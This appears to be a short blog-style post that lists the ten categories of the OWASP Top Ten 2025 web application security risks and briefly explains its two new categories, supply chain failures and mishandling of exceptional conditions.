The OWASP Top Ten is one of the most influential security awareness documents in application security, published by the Open Worldwide Application Security Project (OWASP). It represents a community-driven ranking of the most critical risks facing web applications. The 2025 edition continues the tradition established by previous versions, such as the 2021 list, while updating its focus to reflect changes in how modern software is built, deployed, and attacked.
Here is the updated list:
- A01:2025 – Broken Access Control
- A02:2025 – Security Misconfiguration
- A03:2025 – Software Supply Chain Failures
- A04:2025 – Cryptographic Failures
- A05:2025 – Injection
- A06:2025 – Insecure Design
- A07:2025 – Authentication Failures
- A08:2025 – Software or Data Integrity Failures
- A09:2025 – Security Logging and Alerting Failures
- A10:2025 – Mishandling of Exceptional Conditions
From what it looks like, there are two new categories:
- Software Supply Chain Failures: This new risk category acknowledges that threats can originate far earlier in the SDLC, from compromised packages to insecure dependency management, affecting security outside the codebase itself.
- Mishandling of Exceptional Conditions: This addition captures risks arising from poor error handling, unverified assumptions about system behavior, and exception paths that leave applications in insecure states.
Beyond that, there are some additional changes and reorganizations, we recommend you check out the full new document on the OWASP site.